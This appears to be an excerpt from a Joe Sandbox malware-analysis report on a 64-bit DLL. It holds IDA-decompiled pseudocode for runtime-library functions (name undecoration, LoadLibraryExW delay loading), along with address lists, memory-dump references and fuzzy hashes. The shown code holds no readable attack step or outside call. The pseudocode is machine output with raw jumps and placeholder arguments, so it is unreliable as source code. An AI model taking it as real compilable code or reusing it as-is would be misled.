                                                                      				if ((_t259 & 0x00000002) == 0) goto 0x80038187;
                                                                      				if (_t396 == 0) goto 0x80038182;
                                                                      				 *_t396 =  *_t398;
                                                                      				goto 0x800381b0;
                                                                      				if (_t396 == 0) goto 0x80038192;
                                                                      				 *_t396 =  *_t398;
                                                                      				goto 0x800381b0;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8003819f;
                                                                      				_t397 = _t398[1];
                                                                      				if (_t397 == 0) goto 0x800381ae;
                                                                      				 *_t397 =  *_t398;
                                                                      				return  ~(_t262 | 0xffffffff);
                                                                      			}





























































                                                                      0x180037a44
                                                                      0x180037a44
                                                                      0x180037a44
                                                                      0x180037a49
                                                                      0x180037a60
                                                                      0x180037a63
                                                                      0x180037a66
                                                                      0x180037a6a
                                                                      0x180037a6d
                                                                      0x180037a75
                                                                      0x180037a7b
                                                                      0x180037a7d
                                                                      0x180037a82
                                                                      0x180037a88
                                                                      0x180037a8d
                                                                      0x180037a92
                                                                      0x180037a9b
                                                                      0x180037a9d
                                                                      0x180037aa2
                                                                      0x180037aa5
                                                                      0x180037aa9
                                                                      0x180037aac
                                                                      0x180037ab7
                                                                      0x180037abc
                                                                      0x180037ac1
                                                                      0x180037ac8
                                                                      0x180037ad1
                                                                      0x180037ad4
                                                                      0x180037ae3
                                                                      0x180037ae6
                                                                      0x180037aed
                                                                      0x180037aef
                                                                      0x180037af4
                                                                      0x180037af6
                                                                      0x180037b00
                                                                      0x180037b12
                                                                      0x180037b22
                                                                      0x180037b2b
                                                                      0x180037b2d
                                                                      0x180037b30
                                                                      0x180037b33
                                                                      0x180037b37
                                                                      0x180037b3a
                                                                      0x180037b4a
                                                                      0x180037b57
                                                                      0x180037b64
                                                                      0x180037b6c
                                                                      0x180037b72
                                                                      0x180037b7a
                                                                      0x180037b7a
                                                                      0x180037b7e
                                                                      0x180037b86
                                                                      0x180037b8c
                                                                      0x180037b94
                                                                      0x180037b9a
                                                                      0x180037ba2
                                                                      0x180037baa
                                                                      0x180037bb2
                                                                      0x180037bba
                                                                      0x180037bc2
                                                                      0x180037bca
                                                                      0x180037bd2
                                                                      0x180037bda
                                                                      0x180037be2
                                                                      0x180037bea
                                                                      0x180037bf2
                                                                      0x180037bfa
                                                                      0x180037c02
                                                                      0x180037c0a
                                                                      0x180037c15
                                                                      0x180037c27
                                                                      0x180037c30
                                                                      0x180037c3a
                                                                      0x180037c41
                                                                      0x180037c49
                                                                      0x180037c53
                                                                      0x180037c61
                                                                      0x180037c69
                                                                      0x180037c72
                                                                      0x180037c80
                                                                      0x180037c88
                                                                      0x180037c91
                                                                      0x180037c9f
                                                                      0x180037ca7
                                                                      0x180037cb0
                                                                      0x180037cbe
                                                                      0x180037cc6
                                                                      0x180037cce
                                                                      0x180037cdc
                                                                      0x180037ce6
                                                                      0x180037cf2
                                                                      0x180037cfd
                                                                      0x180037d0a
                                                                      0x180037d15
                                                                      0x180037d22
                                                                      0x180037d2d
                                                                      0x180037d3a
                                                                      0x180037d45
                                                                      0x180037d52
                                                                      0x180037d5d
                                                                      0x180037d6a
                                                                      0x180037d75
                                                                      0x180037d82
                                                                      0x180037d89
                                                                      0x180037d96
                                                                      0x180037d9d
                                                                      0x180037daa
                                                                      0x180037db1
                                                                      0x180037dbe
                                                                      0x180037dc5
                                                                      0x180037ddc
                                                                      0x180037dde
                                                                      0x180037deb
                                                                      0x180037df5
                                                                      0x180037dfa
                                                                      0x180037e00
                                                                      0x180037e00
                                                                      0x180037e03
                                                                      0x180037e08
                                                                      0x180037e11
                                                                      0x180037e16
                                                                      0x180037e1b
                                                                      0x180037e1d
                                                                      0x180037e20
                                                                      0x180037e26
                                                                      0x180037e29
                                                                      0x180037e29
                                                                      0x180037e2d
                                                                      0x180037e30
                                                                      0x180037e37
                                                                      0x180037e3c
                                                                      0x180037e44
                                                                      0x180037e48
                                                                      0x180037e4e
                                                                      0x180037e53
                                                                      0x180037e55
                                                                      0x180037e5a
                                                                      0x180037e60
                                                                      0x180037e65
                                                                      0x180037e6b
                                                                      0x180037e71
                                                                      0x180037e77
                                                                      0x180037e79
                                                                      0x180037e7f
                                                                      0x180037e81
                                                                      0x180037e85
                                                                      0x180037e85
                                                                      0x180037e89
                                                                      0x180037e8c
                                                                      0x180037e97
                                                                      0x180037ea1
                                                                      0x180037ea5
                                                                      0x180037eaa
                                                                      0x180037ead
                                                                      0x180037ead
                                                                      0x180037eb0
                                                                      0x180037eb6
                                                                      0x180037ebc
                                                                      0x180037ec3
                                                                      0x180037ecd
                                                                      0x180037ed5
                                                                      0x180037ede
                                                                      0x180037ee8
                                                                      0x180037ef6
                                                                      0x180037efe
                                                                      0x180037f07
                                                                      0x180037f15
                                                                      0x180037f1d
                                                                      0x180037f26
                                                                      0x180037f34
                                                                      0x180037f3c
                                                                      0x180037f49
                                                                      0x180037f4f
                                                                      0x180037f55
                                                                      0x180037f5c
                                                                      0x180037f69
                                                                      0x180037f77
                                                                      0x180037f80
                                                                      0x180037f8b
                                                                      0x180037f94
                                                                      0x180037f9f
                                                                      0x180037fa8
                                                                      0x180037fb3
                                                                      0x180037fbc
                                                                      0x180037fc7
                                                                      0x180037fd0
                                                                      0x180037fdb
                                                                      0x180037fe8
                                                                      0x180037ff3
                                                                      0x180038000
                                                                      0x180038007
                                                                      0x180038014
                                                                      0x18003801b
                                                                      0x180038028
                                                                      0x18003802f
                                                                      0x18003803c
                                                                      0x180038043
                                                                      0x18003805a
                                                                      0x180038061
                                                                      0x18003806b
                                                                      0x180038076
                                                                      0x18003807b
                                                                      0x180038081
                                                                      0x180038081
                                                                      0x180038084
                                                                      0x180038089
                                                                      0x18003808e
                                                                      0x180038096
                                                                      0x18003809b
                                                                      0x1800380a1
                                                                      0x1800380a3
                                                                      0x1800380ad
                                                                      0x1800380be
                                                                      0x1800380cc
                                                                      0x1800380d5
                                                                      0x1800380d8
                                                                      0x1800380da
                                                                      0x1800380df
                                                                      0x1800380e7
                                                                      0x1800380eb
                                                                      0x1800380f3
                                                                      0x1800380f9
                                                                      0x1800380fe
                                                                      0x180038100
                                                                      0x180038105
                                                                      0x18003810b
                                                                      0x180038114
                                                                      0x180038116
                                                                      0x18003811a
                                                                      0x180038120
                                                                      0x180038122
                                                                      0x180038127
                                                                      0x18003812c
                                                                      0x180038132
                                                                      0x18003813a
                                                                      0x180038140
                                                                      0x180038146
                                                                      0x18003814b
                                                                      0x18003814d
                                                                      0x180038152
                                                                      0x180038156
                                                                      0x18003815e
                                                                      0x180038168
                                                                      0x18003816d
                                                                      0x18003816f
                                                                      0x180038175
                                                                      0x18003817a
                                                                      0x18003817f
                                                                      0x180038185
                                                                      0x18003818a
                                                                      0x18003818f
                                                                      0x180038195
                                                                      0x18003819b
                                                                      0x18003819f
                                                                      0x1800381a6
                                                                      0x1800381ab
                                                                      0x1800381ca

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: 0$f$p$p
                                                                      • API String ID: 3215553584-1202675169
                                                                      • Opcode ID: 10421c2c6eb771af3d325cd1dc68a951f222a505f2c7c4e62465ec59e4a5a4f0
                                                                      • Instruction ID: d69a1d22070917996906521944f3d449d3064339908e09eac2773a0467de0564
                                                                      • Opcode Fuzzy Hash: 10421c2c6eb771af3d325cd1dc68a951f222a505f2c7c4e62465ec59e4a5a4f0
                                                                      • Instruction Fuzzy Hash: 7312CE3270424A86FBF75A14D0547EB77A1F7887D8F8AC119F68A476C5DF38CA889B04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0000000118000D490(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12) {
                                                                      				intOrPtr _t51;
                                                                      				signed int _t55;
                                                                      				signed int _t65;
                                                                      				signed int _t67;
                                                                      				void* _t68;
                                                                      				intOrPtr* _t88;
                                                                      				char* _t89;
                                                                      				char* _t91;
                                                                      				char* _t92;
                                                                      				char* _t93;
                                                                      				signed long long _t94;
                                                                      				char* _t95;
                                                                      				long long* _t128;
                                                                      				void* _t132;
                                                                      				void* _t134;
                                                                      				void* _t143;
                                                                      
                                                                      				_t143 = __r11;
                                                                      				_t130 = __rsi;
                                                                      				_t100 = __rbx;
                                                                      				_t68 = __edx;
                                                                      				 *((long long*)(_t134 + 8)) = __rbx;
                                                                      				 *((long long*)(_t134 + 0x10)) = __rdi;
                                                                      				_t132 = _t134 - 0x57;
                                                                      				_t128 = __rcx;
                                                                      				 *__rcx =  *((intOrPtr*)(__rdx));
                                                                      				_t51 =  *((intOrPtr*)(__rdx + 8));
                                                                      				 *((intOrPtr*)(__rcx + 8)) = _t51;
                                                                      				if (_t51 - 1 > 0) goto 0x8000d67f;
                                                                      				_t88 =  *0x80071308; // 0x0
                                                                      				 *(_t132 + 0xf) =  *(_t132 + 0xf) & 0x00000000;
                                                                      				if ( *_t88 == 0) goto 0x8000d657;
                                                                      				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                                      				_t10 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                                      				_t13 = _t132 + 7; // 0x6007
                                                                      				 *(_t132 + 7) =  *(_t132 + 7) & 0x00000000;
                                                                      				_t16 = _t132 + 0x17; // 0x6017
                                                                      				 *(_t134 - 0x90 + 0x20) =  *(_t134 - 0x90 + 0x20) & 0x00000000;
                                                                      				r8d = 0;
                                                                      				E0000000118000841C(__edi, __rbx, _t16, _t13, __rcx, __rsi, _t10);
                                                                      				r8b = 0x20;
                                                                      				_t19 = _t132 + 0x27; // 0x6027
                                                                      				_t20 = _t132 + 0x17; // 0x6017
                                                                      				E00000001180005F74(_t20, _t19);
                                                                      				_t21 = _t132 + 0x37; // 0x6037
                                                                      				E00000001180005F48(_t88, _t21, _t128);
                                                                      				 *_t128 =  *_t88;
                                                                      				_t55 =  *(_t88 + 8);
                                                                      				 *(_t128 + 8) = _t55;
                                                                      				if (_t55 - 1 > 0) goto 0x8000d67f;
                                                                      				_t89 =  *0x80071308; // 0x0
                                                                      				if ( *_t89 == 0x40) goto 0x8000d64b;
                                                                      				 *(_t132 + 0xf) = 5;
                                                                      				 *(_t132 + 7) = "{for ";
                                                                      				_t26 = _t132 + 0x17; // 0x6017
                                                                      				asm("movaps xmm0, [ebp+0x7]");
                                                                      				asm("movdqa [ebp+0x17], xmm0");
                                                                      				E00000001180006010(_t68, __edi, "{for ", _t100, _t128, _t26, _t130);
                                                                      				_t91 =  *0x80071308; // 0x0
                                                                      				if ( *(_t128 + 8) - 1 > 0) goto 0x8000d646;
                                                                      				if ( *_t91 == 0) goto 0x8000d628;
                                                                      				if ( *_t91 == 0x40) goto 0x8000d61e;
                                                                      				_t28 = _t132 + 0x37; // 0x6037
                                                                      				E0000000118000B5B8(__edi, _t100, _t28, _t128, _t130, __r10, _t143, __r12);
                                                                      				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                                      				_t31 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                                      				_t101 = _t91;
                                                                      				E00000001180007320(0x60, _t91, _t91, _t31);
                                                                      				_t34 = _t132 + 0x17; // 0x6017
                                                                      				_t35 = _t132 - 9; // 0x5ff7
                                                                      				E00000001180005F48(_t35, _t34, _t91);
                                                                      				r8b = 0x27;
                                                                      				_t36 = _t132 + 0x47; // 0x6047
                                                                      				_t37 = _t132 + 0x17; // 0x6017
                                                                      				E00000001180005F74(_t37, _t36);
                                                                      				E00000001180006090( *(_t128 + 8), _t128, _t91, _t91);
                                                                      				_t92 =  *0x80071308; // 0x0
                                                                      				if ( *_t92 != 0x40) goto 0x8000d5e9;
                                                                      				_t93 = _t92 + 1;
                                                                      				 *0x80071308 = _t93;
                                                                      				_t67 =  *(_t128 + 8);
                                                                      				if (_t67 - 1 > 0) goto 0x8000d646;
                                                                      				if ( *_t93 == 0x40) goto 0x8000d56d;
                                                                      				_t94 = "s ";
                                                                      				 *(_t132 + 0xf) = 2;
                                                                      				 *(_t132 + 7) = _t94;
                                                                      				_t41 = _t132 + 0x27; // 0x6027
                                                                      				asm("movaps xmm0, [ebp+0x7]");
                                                                      				asm("movdqa [ebp+0x27], xmm0");
                                                                      				goto 0x8000d55b;
                                                                      				if (_t67 - 1 > 0) goto 0x8000d646;
                                                                      				if ( *_t94 != 0) goto 0x8000d635;
                                                                      				E00000001180006244(1, _t94, _t128, _t41);
                                                                      				E00000001180006144(0x7d, _t94, _t101, _t128);
                                                                      				_t95 =  *0x80071308; // 0x0
                                                                      				if ( *_t95 != 0x40) goto 0x8000d67f;
                                                                      				 *0x80071308 = _t95 + 1;
                                                                      				goto 0x8000d67f;
                                                                      				_t42 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 + 7) = 0x8005f780;
                                                                      				_t44 = _t132 + 7; // 0x6007
                                                                      				E00000001180005F48(_t44, _t42, _t128);
                                                                      				 *_t128 =  *(_t132 - 9);
                                                                      				_t65 =  *(_t132 - 1);
                                                                      				 *(_t128 + 8) = _t65;
                                                                      				return _t65;
                                                                      			}



















                                                                      0x18000d490
                                                                      0x18000d490
                                                                      0x18000d490
                                                                      0x18000d490
                                                                      0x18000d490
                                                                      0x18000d495
                                                                      0x18000d49b
                                                                      0x18000d4aa
                                                                      0x18000d4ad
                                                                      0x18000d4b0
                                                                      0x18000d4b3
                                                                      0x18000d4b8
                                                                      0x18000d4be
                                                                      0x18000d4c5
                                                                      0x18000d4cc
                                                                      0x18000d4d2
                                                                      0x18000d4d7
                                                                      0x18000d4db
                                                                      0x18000d4df
                                                                      0x18000d4e3
                                                                      0x18000d4e8
                                                                      0x18000d4ec
                                                                      0x18000d4f1
                                                                      0x18000d4f4
                                                                      0x18000d4f9
                                                                      0x18000d4fc
                                                                      0x18000d500
                                                                      0x18000d504
                                                                      0x18000d50c
                                                                      0x18000d513
                                                                      0x18000d51b
                                                                      0x18000d51e
                                                                      0x18000d521
                                                                      0x18000d526
                                                                      0x18000d52c
                                                                      0x18000d536
                                                                      0x18000d543
                                                                      0x18000d54a
                                                                      0x18000d54e
                                                                      0x18000d552
                                                                      0x18000d556
                                                                      0x18000d55e
                                                                      0x18000d566
                                                                      0x18000d570
                                                                      0x18000d579
                                                                      0x18000d582
                                                                      0x18000d588
                                                                      0x18000d58c
                                                                      0x18000d591
                                                                      0x18000d596
                                                                      0x18000d59a
                                                                      0x18000d5a0
                                                                      0x18000d5a3
                                                                      0x18000d5ab
                                                                      0x18000d5af
                                                                      0x18000d5b3
                                                                      0x18000d5b8
                                                                      0x18000d5bb
                                                                      0x18000d5bf
                                                                      0x18000d5c3
                                                                      0x18000d5ce
                                                                      0x18000d5d3
                                                                      0x18000d5dd
                                                                      0x18000d5df
                                                                      0x18000d5e2
                                                                      0x18000d5e9
                                                                      0x18000d5ef
                                                                      0x18000d5f4
                                                                      0x18000d5fa
                                                                      0x18000d601
                                                                      0x18000d608
                                                                      0x18000d60c
                                                                      0x18000d610
                                                                      0x18000d614
                                                                      0x18000d619
                                                                      0x18000d621
                                                                      0x18000d626
                                                                      0x18000d630
                                                                      0x18000d63a
                                                                      0x18000d63f
                                                                      0x18000d649
                                                                      0x18000d64e
                                                                      0x18000d655
                                                                      0x18000d661
                                                                      0x18000d665
                                                                      0x18000d669
                                                                      0x18000d66d
                                                                      0x18000d676
                                                                      0x18000d679
                                                                      0x18000d67c
                                                                      0x18000d696

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$Name::operator+=
                                                                      • String ID: {for
                                                                      • API String ID: 179159573-864106941
                                                                      • Opcode ID: 49e5a9deee27bc709e145e00bf8a4ac405ad3ca45f043c294c427107788b0dc2
                                                                      • Instruction ID: 8b952993bc2072d49fe6a7282d269b813213c3ed4856af55e93548b82857096d
                                                                      • Opcode Fuzzy Hash: 49e5a9deee27bc709e145e00bf8a4ac405ad3ca45f043c294c427107788b0dc2
                                                                      • Instruction Fuzzy Hash: 39514972604B88A9EB92DF24D4813E933A1E349789F80C052FA4C4BB96DF79C798C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00000001180046D38(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                      				void* _t37;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t72;
                                                                      				void* _t75;
                                                                      				signed long long _t76;
                                                                      				long long _t82;
                                                                      				void* _t86;
                                                                      				signed long long _t90;
                                                                      				signed long long _t91;
                                                                      				WCHAR* _t93;
                                                                      				long _t96;
                                                                      				void* _t99;
                                                                      				WCHAR* _t104;
                                                                      
                                                                      				 *((long long*)(_t86 + 8)) = __rbx;
                                                                      				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                      				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                      				r15d = __ecx;
                                                                      				_t90 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t76 = _t75 | 0xffffffff;
                                                                      				_t72 = _t90 ^  *(0x180000000 + 0x71f90 + _t104 * 8);
                                                                      				asm("dec eax");
                                                                      				if (_t72 == _t76) goto 0x80046e7e;
                                                                      				if (_t72 == 0) goto 0x80046da1;
                                                                      				_t57 = _t72;
                                                                      				goto 0x80046e80;
                                                                      				if (__r8 == __r9) goto 0x80046e63;
                                                                      				_t61 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8));
                                                                      				if (_t61 == 0) goto 0x80046dc8;
                                                                      				if (_t61 != _t76) goto 0x80046ebd;
                                                                      				goto 0x80046e4f;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t104, _t99, _t96);
                                                                      				if (_t57 != 0) goto 0x80046e9d;
                                                                      				if (GetLastError() != 0x57) goto 0x80046e3d;
                                                                      				_t14 = _t57 - 0x50; // -80
                                                                      				_t37 = _t14;
                                                                      				r8d = _t37;
                                                                      				if (E0000000118003C5E8(_t90) == 0) goto 0x80046e3d;
                                                                      				r8d = _t37;
                                                                      				if (E0000000118003C5E8(_t90) == 0) goto 0x80046e3d;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(_t93, _t75);
                                                                      				if (_t57 != 0) goto 0x80046e9d;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8)) = _t76;
                                                                      				if (__r8 + 4 != __r9) goto 0x80046daa;
                                                                      				_t91 =  *0x80070098; // 0xd02b0a549a3
                                                                      				asm("dec eax");
                                                                      				 *(0x180000000 + 0x71f90 + _t104 * 8) = _t76 ^ _t91;
                                                                      				return 0;
                                                                      			}

















                                                                      0x180046d38
                                                                      0x180046d3d
                                                                      0x180046d42
                                                                      0x180046d54
                                                                      0x180046d6f
                                                                      0x180046d76
                                                                      0x180046d80
                                                                      0x180046d88
                                                                      0x180046d8e
                                                                      0x180046d97
                                                                      0x180046d99
                                                                      0x180046d9c
                                                                      0x180046da4
                                                                      0x180046dad
                                                                      0x180046db8
                                                                      0x180046dbd
                                                                      0x180046dc3
                                                                      0x180046dd5
                                                                      0x180046ddb
                                                                      0x180046de7
                                                                      0x180046df6
                                                                      0x180046df8
                                                                      0x180046df8
                                                                      0x180046dfe
                                                                      0x180046e0f
                                                                      0x180046e11
                                                                      0x180046e25
                                                                      0x180046e27
                                                                      0x180046e2f
                                                                      0x180046e3b
                                                                      0x180046e47
                                                                      0x180046e56
                                                                      0x180046e5c
                                                                      0x180046e70
                                                                      0x180046e76
                                                                      0x180046e9c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 4272bd44501fadda342918ba32e514b2cb81dd19851a8ddf47d7ea8790db32cc
                                                                      • Instruction ID: 824b752b177edb4b05612529a335346cb82f1823fc0870321cef3e784436dcc0
                                                                      • Opcode Fuzzy Hash: 4272bd44501fadda342918ba32e514b2cb81dd19851a8ddf47d7ea8790db32cc
                                                                      • Instruction Fuzzy Hash: 4E411D76B10E0881FA93DB16E8403D523D2AB4CBE4F09C126FD198B7A4EE3DD6898344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00000001180046FF4(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed long long _t41;
                                                                      				intOrPtr _t45;
                                                                      				signed long long _t46;
                                                                      				signed long long _t66;
                                                                      				long _t70;
                                                                      				void* _t73;
                                                                      				WCHAR* _t76;
                                                                      
                                                                      				_t41 = _t66;
                                                                      				 *((long long*)(_t41 + 8)) = __rbx;
                                                                      				 *((long long*)(_t41 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t41 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t41 + 0x20)) = __rdi;
                                                                      				if (__rdx == __r8) goto 0x800470d5;
                                                                      				_t45 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8));
                                                                      				if (_t45 == 0) goto 0x80047048;
                                                                      				if (_t45 != 0xffffffff) goto 0x8004710f;
                                                                      				goto 0x800470c8;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t76, _t73, _t70);
                                                                      				_t46 = _t41;
                                                                      				if (_t41 != 0) goto 0x800470f6;
                                                                      				if (GetLastError() != 0x57) goto 0x800470bc;
                                                                      				_t12 = _t46 + 7; // 0x7
                                                                      				r8d = _t12;
                                                                      				if (E0000000118003C5E8(__r8) == 0) goto 0x800470bc;
                                                                      				_t13 = _t46 + 7; // 0x7
                                                                      				r8d = _t13;
                                                                      				if (E0000000118003C5E8(__r8) == 0) goto 0x800470bc;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t41 != 0) goto 0x800470f6;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8)) = _t41 | 0xffffffff;
                                                                      				if (__rdx + 4 != __r8) goto 0x8004702a;
                                                                      				return 0;
                                                                      			}










                                                                      0x180046ff4
                                                                      0x180046ff7
                                                                      0x180046ffb
                                                                      0x180046fff
                                                                      0x180047003
                                                                      0x18004701d
                                                                      0x18004702c
                                                                      0x180047037
                                                                      0x18004703d
                                                                      0x180047043
                                                                      0x180047055
                                                                      0x18004705b
                                                                      0x180047061
                                                                      0x180047067
                                                                      0x180047076
                                                                      0x180047078
                                                                      0x180047078
                                                                      0x18004708d
                                                                      0x18004708f
                                                                      0x18004708f
                                                                      0x1800470a4
                                                                      0x1800470a6
                                                                      0x1800470ae
                                                                      0x1800470ba
                                                                      0x1800470c0
                                                                      0x1800470cf
                                                                      0x1800470f5

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 2559590344-537541572
                                                                      • Opcode ID: 33170cbb70bb6713f5e3991073c883806becb768ce094ee5d31b78fb3ee0fe7c
                                                                      • Instruction ID: 8604e60a5cdf88db9f886e92d9eae1edd4f6bd7978d36ae125add8b6f832c906
                                                                      • Opcode Fuzzy Hash: 33170cbb70bb6713f5e3991073c883806becb768ce094ee5d31b78fb3ee0fe7c
                                                                      • Instruction Fuzzy Hash: 1A31C031302F0891EAA3CB26A8403D963A5B70CBF4F098225FE2D437D1EF38D6498308
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0000000118001A9FC(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, void* __r10, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				signed int _t134;
                                                                      				void* _t154;
                                                                      				void* _t184;
                                                                      				signed short _t197;
                                                                      				signed short _t198;
                                                                      				signed int _t199;
                                                                      				signed int _t246;
                                                                      				signed int _t248;
                                                                      				signed int _t250;
                                                                      				signed int _t254;
                                                                      				signed int _t257;
                                                                      				signed short* _t371;
                                                                      				signed short* _t372;
                                                                      				signed short* _t374;
                                                                      				signed short** _t375;
                                                                      				long long _t376;
                                                                      				long long* _t379;
                                                                      				signed short* _t380;
                                                                      				signed short* _t381;
                                                                      				signed short** _t385;
                                                                      				long long* _t386;
                                                                      				long long* _t387;
                                                                      				signed short** _t388;
                                                                      				void* _t389;
                                                                      				signed short* _t394;
                                                                      				signed short* _t395;
                                                                      				long long _t397;
                                                                      				intOrPtr _t398;
                                                                      				long long _t399;
                                                                      				signed short* _t400;
                                                                      
                                                                      				_t385 = __rdx;
                                                                      				_t376 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t399 =  *__rdx;
                                                                      				r12d = 0;
                                                                      				_v64 = _t399;
                                                                      				r14d = r8d;
                                                                      				_t388 = __rdx;
                                                                      				if (_t399 != 0) goto 0x8001aa43;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 0x16;
                                                                      				E00000001180013928();
                                                                      				goto 0x8001aa75;
                                                                      				if (r14d == 0) goto 0x8001aa8d;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x8001aa8d;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
